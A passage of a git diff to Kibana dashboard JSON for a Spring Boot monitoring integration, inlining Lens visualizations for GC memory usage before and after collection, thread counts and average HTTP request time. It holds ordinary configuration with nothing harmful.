"@timestamp" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Before", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + }, + "formula": "sum(spring_boot.gc.last_info.memory_usage.before.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used)", + "isFormulaBroken": false + }, + "references": [ + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9" + ], + "scale": "ratio" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.code_cache.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.metaspace.used" + }, + 
"79ffbc3e-e907-45d9-b727-6710ca8b19c7X3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9": { + "customLabel": true, + 
"dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8" + ], + "location": { + "max": 624, + "min": 0 + }, + "name": "add", + "text": "sum(spring_boot.gc.last_info.memory_usage.before.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used)", + "type": "function" + } + }, + "references": [ + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5", 
+ "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8" + ], + "scale": "ratio" + }, + "94f7e582-69e9-4fe4-9111-75aaa6a3d470": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of spring_boot.gc.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "spring_boot.gc.name" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "After", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + }, + "formula": "sum(spring_boot.gc.last_info.memory_usage.after.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used)", + "isFormulaBroken": false + }, + "references": [ + "df8aa04a-8859-48a8-8624-e204eb09ad23X9" + ], + "scale": "ratio" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": 
"spring_boot.gc.last_info.memory_usage.after.code_cache.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.metaspace.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used" + }, + 
"df8aa04a-8859-48a8-8624-e204eb09ad23X7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X9": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + "df8aa04a-8859-48a8-8624-e204eb09ad23X0", + "df8aa04a-8859-48a8-8624-e204eb09ad23X1" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X2" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X3" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X4" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X5" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X6" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X7" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X8" + ], + "location": { + "max": 615, + "min": 0 + }, + "name": "add", + "text": 
"sum(spring_boot.gc.last_info.memory_usage.after.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used)", + "type": "function" + } + }, + "references": [ + "df8aa04a-8859-48a8-8624-e204eb09ad23X0", + "df8aa04a-8859-48a8-8624-e204eb09ad23X1", + "df8aa04a-8859-48a8-8624-e204eb09ad23X2", + "df8aa04a-8859-48a8-8624-e204eb09ad23X3", + "df8aa04a-8859-48a8-8624-e204eb09ad23X4", + "df8aa04a-8859-48a8-8624-e204eb09ad23X5", + "df8aa04a-8859-48a8-8624-e204eb09ad23X6", + "df8aa04a-8859-48a8-8624-e204eb09ad23X7", + "df8aa04a-8859-48a8-8624-e204eb09ad23X8" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "8aabc9bc-b40b-4f3c-b077-c4d19cd6b477", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.gc" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.gc" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "df8aa04a-8859-48a8-8624-e204eb09ad23", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7" + ], 
+ "layerId": "e937f0c4-f880-4837-9315-69d043a3f6b1", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "94f7e582-69e9-4fe4-9111-75aaa6a3d470", + "xAccessor": "01e713a3-bda9-4e10-b460-988900367abf" + } + ], + "legend": { + "isVisible": true, + "legendSize": "xlarge", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "GC Memory Usage" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 10, - "i": "b55b6992-8179-4bf9-8e79-8354509a956e", - "w": 24, - "x": 24, - "y": 10 - }, - "panelIndex": "b55b6992-8179-4bf9-8e79-8354509a956e", - "panelRefName": "panel_b55b6992-8179-4bf9-8e79-8354509a956e", - "type": "lens", - "version": "8.1.0" + "title": "Memory usage after and before GC [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e937f0c4-f880-4837-9315-69d043a3f6b1", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8aabc9bc-b40b-4f3c-b077-c4d19cd6b477", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 15, + "i": "f3782cac-5b20-413c-a88d-cb01ebee5772", + "w": 24, + "x": 0, + "y": 15 + }, + "panelIndex": "f3782cac-5b20-413c-a88d-cb01ebee5772", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { + "columnOrder": [ + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", + "522f8dd4-2bc7-4665-9b33-83609e4f3125" + ], + "columns": { + 
"522f8dd4-2bc7-4665-9b33-83609e4f3125": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Current Threads", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.threading.threads.count" + }, + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "6502fda4-d554-4b5d-8e8b-e6d3c873901b", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.threading" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.threading" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "522f8dd4-2bc7-4665-9b33-83609e4f3125" + ], + "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Current Threads" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 10, - "i": 
"e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", - "w": 24, - "x": 24, - "y": 20 - }, - "panelIndex": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", - "panelRefName": "panel_e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Spring Boot] Memory and Threads", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-11-02T08:23:19.946Z", - "id": "spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "dashboard": "8.7.0" - }, - "references": [ - { - "id": "spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd", - "name": "12e70c57-6059-400c-974f-b69423d435e9:panel_12e70c57-6059-400c-974f-b69423d435e9", - "type": "lens" + "title": "Current threads [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6502fda4-d554-4b5d-8e8b-e6d3c873901b", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-4a05b120-c9ea-11ec-b4b1-b57f75afa7dd", - "name": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee:panel_eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", - "type": "lens" + "gridData": { + "h": 10, + "i": "b55b6992-8179-4bf9-8e79-8354509a956e", + "w": 24, + "x": 24, + "y": 10 }, - { - "id": "spring_boot-fae00cb0-ca04-11ec-b4b1-b57f75afa7dd", - "name": "f3782cac-5b20-413c-a88d-cb01ebee5772:panel_f3782cac-5b20-413c-a88d-cb01ebee5772", - "type": "lens" + "panelIndex": "b55b6992-8179-4bf9-8e79-8354509a956e", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { + "columnOrder": [ + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", + "c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c" + ], + "columns": { + 
"c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Daemon Threads", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.threading.threads.daemon" + }, + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "702499ca-434e-41d4-b9a1-1d0bb27b244a", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.threading" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.threading" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c" + ], + "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Daemon Threads" + } + }, + "title": "Daemon threads [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + 
"name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "702499ca-434e-41d4-b9a1-1d0bb27b244a", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-0f481600-ca11-11ec-b4b1-b57f75afa7dd", - "name": "b55b6992-8179-4bf9-8e79-8354509a956e:panel_b55b6992-8179-4bf9-8e79-8354509a956e", - "type": "lens" + "gridData": { + "h": 10, + "i": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", + "w": 24, + "x": 24, + "y": 20 }, - { - "id": "spring_boot-12228630-ca11-11ec-b4b1-b57f75afa7dd", - "name": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508:panel_e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", - "type": "lens" - } + "panelIndex": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", + "type": "lens", + "version": "8.6.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Spring Boot] Memory and Threads", + "version": 1 + }, + "references": [ + { + "type": "index-pattern", + "name": "12e70c57-6059-400c-974f-b69423d435e9:indexpattern-datasource-layer-31ad067d-6820-43dc-a6fd-7a32a6a121f5", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "12e70c57-6059-400c-974f-b69423d435e9:8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee:indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee:61418bc6-4106-4f91-81ea-1e1071b7c9bb", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "f3782cac-5b20-413c-a88d-cb01ebee5772:indexpattern-datasource-layer-e937f0c4-f880-4837-9315-69d043a3f6b1", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "f3782cac-5b20-413c-a88d-cb01ebee5772:8aabc9bc-b40b-4f3c-b077-c4d19cd6b477", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": 
"b55b6992-8179-4bf9-8e79-8354509a956e:indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "b55b6992-8179-4bf9-8e79-8354509a956e:6502fda4-d554-4b5d-8e8b-e6d3c873901b", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508:indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508:702499ca-434e-41d4-b9a1-1d0bb27b244a", + "id": "metrics-*" + } + ], + "managed": false }
\ No newline at end of file
diff --git a/packages/spring_boot/kibana/dashboard/spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746.json b/packages/spring_boot/kibana/dashboard/spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746.json
index 80437a3a80d..9db88464d5b 100644
--- a/packages/spring_boot/kibana/dashboard/spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746.json
+++ b/packages/spring_boot/kibana/dashboard/spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746.json
@@ -1,604 +1,1526 @@ { - "attributes": { - "description": "Overview of Spring Boot Application.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2024-01-03T20:12:28.833Z", + "created_at": "2024-01-03T20:12:28.833Z", + "version": "WzEwMiwxXQ==", + "attributes": { + "description": "Overview of Spring Boot Application.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "786d6832-6c69-42e4-916f-df6df259fad1": { + "columnOrder": [ + "575bdfd0-6d2b-4c15-98f1-760a7c18a50a", + "19721a51-8e2d-4e20-993c-b8d31c721d0f" + ], + "columns": { + "19721a51-8e2d-4e20-993c-b8d31c721d0f": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Avg time", + "operationType": "average", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1 + } + } + }, + "scale": "ratio", + "sourceField": "event.duration" + }, + "575bdfd0-6d2b-4c15-98f1-760a7c18a50a": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "1m" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } } - } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { 
+ "accessors": [ + "19721a51-8e2d-4e20-993c-b8d31c721d0f" + ], + "layerId": "786d6832-6c69-42e4-916f-df6df259fad1", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "575bdfd0-6d2b-4c15-98f1-760a7c18a50a", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "19721a51-8e2d-4e20-993c-b8d31c721d0f" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true, + "legendSize": "auto" + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Average time taken to handle the HTTP request-response exchange [Logs Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-786d6832-6c69-42e4-916f-df6df259fad1", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 12, + "i": "b55e357e-4c45-430c-ae63-2c6facaabc2e", + "w": 20, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "b55e357e-4c45-430c-ae63-2c6facaabc2e", - "w": 20, - "x": 0, - "y": 0 + "panelIndex": "b55e357e-4c45-430c-ae63-2c6facaabc2e", + "type": "lens", + "version": "8.6.0" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "8da90917-936b-49b2-a845-24db7da4681e", + "w": 9, + "x": 20, + "y": 0 + }, + "panelIndex": "8da90917-936b-49b2-a845-24db7da4681e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": 
